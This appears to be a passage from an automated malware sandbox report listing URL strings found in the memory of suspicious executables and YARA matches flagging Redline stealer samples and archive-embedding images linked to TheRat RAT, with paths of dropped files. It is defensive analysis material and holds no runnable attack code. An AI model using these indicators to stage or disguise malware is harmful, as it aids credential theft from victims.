                    Source: 7620ab885d.exe, 00000009.00000003.2148791307.00000000057BF000.00000004.00000800.00020000.00000000.sdmp, 7620ab885d.exe, 00000009.00000003.2154577530.00000000057C2000.00000004.00000800.00020000.00000000.sdmp, 7620ab885d.exe, 00000009.00000003.2153889658.00000000057BF000.00000004.00000800.00020000.00000000.sdmp, 8469cb4d4d.exe, 0000000A.00000003.2214822291.0000000005AE5000.00000004.00000800.00020000.00000000.sdmp, 8469cb4d4d.exe, 0000000A.00000003.2215025395.0000000005AE6000.00000004.00000800.00020000.00000000.sdmp, b285303eae.exe, 0000001B.00000003.2642352150.0000000005560000.00000004.00000800.00020000.00000000.sdmp, b285303eae.exe, 0000001B.00000003.2642705937.0000000005561000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_15d7e4b694824b33323940336fbf0bead57d89764383fe44
                    Source: 7620ab885d.exe, 00000009.00000003.2062883778.000000000577C000.00000004.00000800.00020000.00000000.sdmp, 7620ab885d.exe, 00000009.00000003.2062961074.0000000005779000.00000004.00000800.00020000.00000000.sdmp, 7620ab885d.exe, 00000009.00000003.2063068124.0000000005779000.00000004.00000800.00020000.00000000.sdmp, 8469cb4d4d.exe, 0000000A.00000003.2140842949.0000000005A98000.00000004.00000800.00020000.00000000.sdmp, 8469cb4d4d.exe, 0000000A.00000003.2140548907.0000000005A9B000.00000004.00000800.00020000.00000000.sdmp, 8469cb4d4d.exe, 0000000A.00000003.2140671817.0000000005A98000.00000004.00000800.00020000.00000000.sdmp, b285303eae.exe, 0000001B.00000003.2577549714.000000000550C000.00000004.00000800.00020000.00000000.sdmp, b285303eae.exe, 0000001B.00000003.2578311397.0000000005509000.00000004.00000800.00020000.00000000.sdmp, b285303eae.exe, 0000001B.00000003.2577978340.0000000005509000.00000004.00000800.00020000.00000000.sdmp, b9ba85c997.exe, 0000001D.00000003.2702511803.000000000597B000.00000004.00000800.00020000.00000000.sdmp, b9ba85c997.exe, 0000001D.00000003.2702690612.0000000005978000.00000004.00000800.00020000.00000000.sdmp, b9ba85c997.exe, 0000001D.00000003.2703013767.0000000005978000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                    Source: 7620ab885d.exe, 00000009.00000002.2487887465.00000000057C1000.00000004.00000800.00020000.00000000.sdmp, 7620ab885d.exe, 00000009.00000003.2367077966.00000000057CE000.00000004.00000800.00020000.00000000.sdmp, 7620ab885d.exe, 00000009.00000003.2366887559.00000000057C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.globalsign.com/repository/0
                    Source: 68f6adf5d5.exe, 00000019.00000003.2469893569.0000020F23CD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/
                    Source: 68f6adf5d5.exe, 00000018.00000003.2432933293.0000017A8AA1E000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000018.00000003.2432538646.0000017A8AA18000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000018.00000003.2432902267.0000017A8AA1D000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000018.00000003.2432868807.0000017A8AA1B000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000018.00000003.2432718456.0000017A8AA11000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000018.00000003.2434174344.0000017A8AA1E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/(
                    Source: 68f6adf5d5.exe, 00000019.00000003.2472250876.0000020F23CD0000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000019.00000003.2473141212.0000020F23CD6000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000019.00000003.2474688973.0000020F23CD7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com//
                    Source: 68f6adf5d5.exe, 00000018.00000003.2436593145.0000017A8AA38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com//B
                    Source: 68f6adf5d5.exe, 00000018.00000003.2433194586.0000017A8AA06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/9D42233E921B
                    Source: 68f6adf5d5.exe, 00000019.00000003.2472839204.0000020F23CF8000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000019.00000003.2472250876.0000020F23CD0000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000019.00000003.2472660866.0000020F23CF6000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000019.00000003.2474972154.0000020F23CF8000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000019.00000003.2475524790.0000020F23CF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/Qh
                    Source: 68f6adf5d5.exe, 00000018.00000003.2433943122.0000017A8AA16000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000018.00000003.2433545735.0000017A8AA16000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000018.00000003.2433513616.0000017A8AA0E000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000019.00000003.2468496006.0000020F23CF6000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000019.00000003.2469708354.0000020F23CFA000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000019.00000003.2470775814.0000020F23D0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/V
                    Source: 68f6adf5d5.exe, 00000018.00000003.2438660177.0000017A8AA47000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000018.00000003.2441945698.0000017A8AA55000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000018.00000003.2442579730.0000017A8AA60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/aomeapR
                    Source: 68f6adf5d5.exe, 00000019.00000003.2473325850.0000020F23D13000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000019.00000003.2472161851.0000020F23D0F000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000019.00000003.2471751370.0000020F23D02000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000019.00000003.2475302182.0000020F23D16000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000019.00000003.2473474944.0000020F23D14000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000019.00000003.2472599693.0000020F23D0F000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000019.00000003.2472250876.0000020F23D02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/ata
                    Source: 68f6adf5d5.exe, 00000018.00000003.2433707380.0000017A8AA2E000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000018.00000003.2432718456.0000017A8AA11000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000018.00000003.2432762752.0000017A8AA2B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/com/
                    Source: 68f6adf5d5.exe, 00000019.00000003.2473141212.0000020F23CD6000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000019.00000003.2474688973.0000020F23CD7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/earch
                    Source: 7620ab885d.exe, 00000009.00000003.2062883778.000000000577C000.00000004.00000800.00020000.00000000.sdmp, 7620ab885d.exe, 00000009.00000003.2062961074.0000000005779000.00000004.00000800.00020000.00000000.sdmp, 7620ab885d.exe, 00000009.00000003.2063068124.0000000005779000.00000004.00000800.00020000.00000000.sdmp, 8469cb4d4d.exe, 0000000A.00000003.2140842949.0000000005A98000.00000004.00000800.00020000.00000000.sdmp, 8469cb4d4d.exe, 0000000A.00000003.2140548907.0000000005A9B000.00000004.00000800.00020000.00000000.sdmp, 8469cb4d4d.exe, 0000000A.00000003.2140671817.0000000005A98000.00000004.00000800.00020000.00000000.sdmp, b285303eae.exe, 0000001B.00000003.2577549714.000000000550C000.00000004.00000800.00020000.00000000.sdmp, b285303eae.exe, 0000001B.00000003.2578311397.0000000005509000.00000004.00000800.00020000.00000000.sdmp, b285303eae.exe, 0000001B.00000003.2577978340.0000000005509000.00000004.00000800.00020000.00000000.sdmp, b9ba85c997.exe, 0000001D.00000003.2702511803.000000000597B000.00000004.00000800.00020000.00000000.sdmp, b9ba85c997.exe, 0000001D.00000003.2702690612.0000000005978000.00000004.00000800.00020000.00000000.sdmp, b9ba85c997.exe, 0000001D.00000003.2703013767.0000000005978000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                    Source: 68f6adf5d5.exe, 00000019.00000003.2469893569.0000020F23CD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/khi
                    Source: 68f6adf5d5.exe, 00000019.00000003.2470963577.0000020F23CEF000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000019.00000003.2468614920.0000020F23CE2000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000019.00000003.2470055459.0000020F23CEF000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000019.00000003.2469202374.0000020F23CEB000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000019.00000003.2469570975.0000020F23CEB000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000019.00000003.2468680946.0000020F23CE8000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000019.00000003.2468814696.0000020F23CEA000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000019.00000003.2469439902.0000020F23CEB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/ls
                    Source: 68f6adf5d5.exe, 00000019.00000003.2472250876.0000020F23CD0000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000019.00000003.2472660866.0000020F23CF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/xh#?
                    Source: 68f6adf5d5.exe, 00000018.00000003.2436593145.0000017A8AA38000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000018.00000003.2436726215.0000017A8AA54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/zG
                    Source: 68f6adf5d5.exe, 00000018.00000003.2433943122.0000017A8AA16000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000018.00000003.2434620313.0000017A8AA17000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000018.00000003.2434776422.0000017A8AA17000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000018.00000003.2433545735.0000017A8AA16000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000018.00000003.2432933293.0000017A8AA16000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000018.00000003.2434384672.0000017A8AA17000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000018.00000003.2432718456.0000017A8AA11000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000018.00000003.2433513616.0000017A8AA0E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/~
                    Source: 68f6adf5d5.exe, 00000019.00000003.2469893569.0000020F23CD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/
                    Source: 68f6adf5d5.exe, 00000019.00000003.2472161851.0000020F23D0F000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000019.00000003.2471751370.0000020F23D02000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000019.00000003.2472599693.0000020F23D0F000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000019.00000003.2472250876.0000020F23D02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/chro
                    Source: 68f6adf5d5.exe, 00000019.00000003.2469439902.0000020F23CEB000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000019.00000003.2474688973.0000020F23CD7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/chromewebstore
                    Source: 68f6adf5d5.exe, 00000019.00000003.2470963577.0000020F23CFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/chromewebstore.readonly
                    Source: 68f6adf5d5.exe, 00000019.00000003.2473325850.0000020F23D13000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000019.00000003.2475302182.0000020F23D16000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000019.00000003.2473474944.0000020F23D14000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000019.00000003.2472599693.0000020F23D0F000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000019.00000003.2472250876.0000020F23D02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/chromewebstore.readonly4EEE6F7F
                    Source: 68f6adf5d5.exe, 00000018.00000003.2433787726.0000017A8AA02000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000018.00000003.2433428751.0000017A8AA02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/chromewebstore.readonly616FBB22
                    Source: 68f6adf5d5.exe, 00000018.00000003.2438660177.0000017A8AA47000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000018.00000003.2436896441.0000017A8AA46000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/chromewebstore.readonlyCC0BDA45
                    Source: 68f6adf5d5.exe, 00000018.00000003.2442031009.0000017A8AA47000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000018.00000003.2442121158.0000017A8AA52000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000018.00000003.2438660177.0000017A8AA47000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000018.00000003.2442075697.0000017A8AA4E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/chromewebstore.readonlyCF630DF4
                    Source: 68f6adf5d5.exe, 00000019.00000003.2473325850.0000020F23D13000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000019.00000003.2475302182.0000020F23D16000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000019.00000003.2473474944.0000020F23D14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/chromewebstore.readonlyEACB672Dlay
                    Source: 68f6adf5d5.exe, 00000019.00000003.2468496006.0000020F23CF6000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000019.00000003.2469708354.0000020F23CFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/chromewebstore.readonlyY
                    Source: 68f6adf5d5.exe, 00000019.00000003.2473325850.0000020F23D13000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000019.00000003.2475302182.0000020F23D16000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000019.00000003.2473474944.0000020F23D14000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000019.00000003.2472599693.0000020F23D0F000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000019.00000003.2472250876.0000020F23D02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/chromewebstore1B3F6Z
                    Source: 68f6adf5d5.exe, 00000018.00000003.2433787726.0000017A8AA02000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000018.00000003.2433428751.0000017A8AA02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/chromewebstore2nit
                    Source: 68f6adf5d5.exe, 00000019.00000003.2468496006.0000020F23CF6000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000019.00000003.2469708354.0000020F23CFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/chromewebstore3
                    Source: 68f6adf5d5.exe, 00000019.00000003.2473141212.0000020F23CD6000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000019.00000003.2474688973.0000020F23CD7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/chromewebstore6J
                    Source: 68f6adf5d5.exe, 00000018.00000003.2442031009.0000017A8AA47000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000018.00000003.2442121158.0000017A8AA52000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000018.00000003.2438660177.0000017A8AA47000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000018.00000003.2436896441.0000017A8AA46000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000018.00000003.2442075697.0000017A8AA4E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/chromewebstoreBF47UB
                    Source: 68f6adf5d5.exe, 00000018.00000003.2436593145.0000017A8AA38000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000018.00000003.2438660177.0000017A8AA47000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000018.00000003.2436896441.0000017A8AA46000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/chromewebstorej
                    Source: 68f6adf5d5.exe, 00000019.00000003.2468614920.0000020F23CE2000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000019.00000003.2468680946.0000020F23CE8000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000019.00000003.2468814696.0000020F23CEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/chromewebstoreo
                    Source: 68f6adf5d5.exe, 00000018.00000003.2442031009.0000017A8AA47000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000018.00000003.2438660177.0000017A8AA47000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000018.00000003.2442121158.0000017A8AA4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/chromewebstorev
                    Source: 68f6adf5d5.exe, 00000019.00000003.2472161851.0000020F23D0F000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000019.00000003.2471751370.0000020F23D02000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000019.00000003.2472599693.0000020F23D0F000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000019.00000003.2472250876.0000020F23D02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/sierr
                    Source: 68f6adf5d5.exe, 00000019.00000003.2468814696.0000020F23CEA000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000019.00000003.2469439902.0000020F23CEB000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000019.00000003.2474688973.0000020F23CD7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/sierra
                    Source: 68f6adf5d5.exe, 00000018.00000003.2436593145.0000017A8AA38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/sierra2
                    Source: 68f6adf5d5.exe, 00000019.00000003.2468496006.0000020F23CF6000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000019.00000003.2469708354.0000020F23CFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/sierra324091433FB53
                    Source: 68f6adf5d5.exe, 00000019.00000003.2470963577.0000020F23CEF000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000019.00000003.2470055459.0000020F23CEF000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000019.00000003.2469202374.0000020F23CEB000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000019.00000003.2469570975.0000020F23CEB000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000019.00000003.2469439902.0000020F23CEB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/sierra6_0
                    Source: 68f6adf5d5.exe, 00000019.00000003.2473325850.0000020F23D13000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000019.00000003.2475302182.0000020F23D16000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000019.00000003.2473474944.0000020F23D14000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000019.00000003.2472599693.0000020F23D0F000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000019.00000003.2472250876.0000020F23D02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/sierra734160BFD702D
                    Source: 68f6adf5d5.exe, 00000019.00000003.2473141212.0000020F23CD6000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000019.00000003.2474688973.0000020F23CD7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/sierraFJ
                    Source: 68f6adf5d5.exe, 00000019.00000003.2472250876.0000020F23CD0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/sierrafJU#$
                    Source: 68f6adf5d5.exe, 00000019.00000003.2474688973.0000020F23CD7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/sierrasandbox
                    Source: 68f6adf5d5.exe, 00000018.00000003.2442031009.0000017A8AA47000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000018.00000003.2442121158.0000017A8AA52000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000018.00000003.2438660177.0000017A8AA47000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000018.00000003.2436896441.0000017A8AA46000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000018.00000003.2442075697.0000017A8AA4E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/sierrasandbox33FB53mB
                    Source: 68f6adf5d5.exe, 00000019.00000003.2473325850.0000020F23D13000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000019.00000003.2475302182.0000020F23D16000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000019.00000003.2473474944.0000020F23D14000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000019.00000003.2472599693.0000020F23D0F000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000019.00000003.2472250876.0000020F23D02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/sierrasandbox36CB7E
                    Source: 68f6adf5d5.exe, 00000018.00000003.2433787726.0000017A8AA02000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000018.00000003.2433428751.0000017A8AA02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/sierrasandboxD500
                    Source: 68f6adf5d5.exe, 00000019.00000003.2468496006.0000020F23CF6000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000019.00000003.2469708354.0000020F23CFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/sierrasandboxF75F3F
                    Source: 68f6adf5d5.exe, 00000019.00000003.2468614920.0000020F23CE2000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000019.00000003.2468680946.0000020F23CE8000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000019.00000003.2468814696.0000020F23CEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/sierrasandboxK
                    Source: 68f6adf5d5.exe, 00000019.00000003.2472250876.0000020F23CD0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/sierrasandboxVJ
                    Source: 7620ab885d.exe, 00000009.00000003.2124109168.00000000057C4000.00000004.00000800.00020000.00000000.sdmp, 8469cb4d4d.exe, 0000000A.00000003.2214822291.0000000005AE5000.00000004.00000800.00020000.00000000.sdmp, 8469cb4d4d.exe, 0000000A.00000003.2215025395.0000000005AE6000.00000004.00000800.00020000.00000000.sdmp, b285303eae.exe, 0000001B.00000003.2642352150.0000000005560000.00000004.00000800.00020000.00000000.sdmp, b285303eae.exe, 0000001B.00000003.2642705937.0000000005561000.00000004.00000800.00020000.00000000.sdmp, b9ba85c997.exe, 0000001D.00000003.2791892110.00000000059CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
                    Source: 7620ab885d.exe, 00000009.00000003.2123559065.000000000584A000.00000004.00000800.00020000.00000000.sdmp, 8469cb4d4d.exe, 0000000A.00000003.2192445390.0000000005B6A000.00000004.00000800.00020000.00000000.sdmp, b285303eae.exe, 0000001B.00000003.2640419965.0000000005573000.00000004.00000800.00020000.00000000.sdmp, b9ba85c997.exe, 0000001D.00000003.2780516155.000000000594C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
                    Source: b9ba85c997.exe, 0000001D.00000003.2786175481.0000000005A5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.0JoCxlq8ibGr
                    Source: b9ba85c997.exe, 0000001D.00000003.2786175481.0000000005A5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.Tgc_vjLFc3HK
                    Source: b9ba85c997.exe, 0000001D.00000003.2786175481.0000000005A5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                    Source: 7620ab885d.exe, 00000009.00000003.2123694982.0000000005A6D000.00000004.00000800.00020000.00000000.sdmp, 8469cb4d4d.exe, 0000000A.00000003.2192628748.0000000005D86000.00000004.00000800.00020000.00000000.sdmp, b285303eae.exe, 0000001B.00000003.2640971301.00000000055F4000.00000004.00000800.00020000.00000000.sdmp, b9ba85c997.exe, 0000001D.00000003.2786175481.0000000005A5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                    Source: firefox.exe, 00000030.00000002.2974700144.00000195C2FF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: 11.2.0a7e8af92e.exe.1c1310fe590.3.unpack, type: UNPACKEDPEMatched rule: Finds Redline samples based on characteristic strings Author: Sekoia.io
                    Source: 11.2.0a7e8af92e.exe.1c1310d6568.2.unpack, type: UNPACKEDPEMatched rule: Finds Redline samples based on characteristic strings Author: Sekoia.io
                    Source: 11.2.0a7e8af92e.exe.1c1310fe590.3.raw.unpack, type: UNPACKEDPEMatched rule: Finds Redline samples based on characteristic strings Author: Sekoia.io
                    Source: 11.2.0a7e8af92e.exe.1c1310d6568.2.raw.unpack, type: UNPACKEDPEMatched rule: Finds Redline samples based on characteristic strings Author: Sekoia.io
                    Source: 11.2.0a7e8af92e.exe.1c13114e5a8.1.raw.unpack, type: UNPACKEDPEMatched rule: Finds Redline samples based on characteristic strings Author: Sekoia.io
                    Source: 11.2.0a7e8af92e.exe.1c13114e5a8.1.unpack, type: UNPACKEDPEMatched rule: Finds Redline samples based on characteristic strings Author: Sekoia.io
                    Source: 16.0.DJj.exe.1b0000.0.unpack, type: UNPACKEDPEMatched rule: Finds Redline samples based on characteristic strings Author: Sekoia.io
                    Source: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\output[1].png, type: DROPPEDMatched rule: Detects images embedding archives. Observed in TheRat RAT. Author: ditekSHen
                    Source: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f, type: DROPPEDMatched rule: Detects images embedding archives. Observed in TheRat RAT. Author: ditekSHen
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exe, type: DROPPEDMatched rule: Finds Redline samples based on characteristic strings Author: Sekoia.io
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\output[1].png, type: DROPPEDMatched rule: Detects images embedding archives. Observed in TheRat RAT. Author: ditekSHen
                    Binary is likely a compiled AutoIt script file
                    Source: fb584dabd7.exe, 00000020.00000000.2839375451.0000000001002000.00000002.00000001.01000000.00000019.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_a79d3c74-0
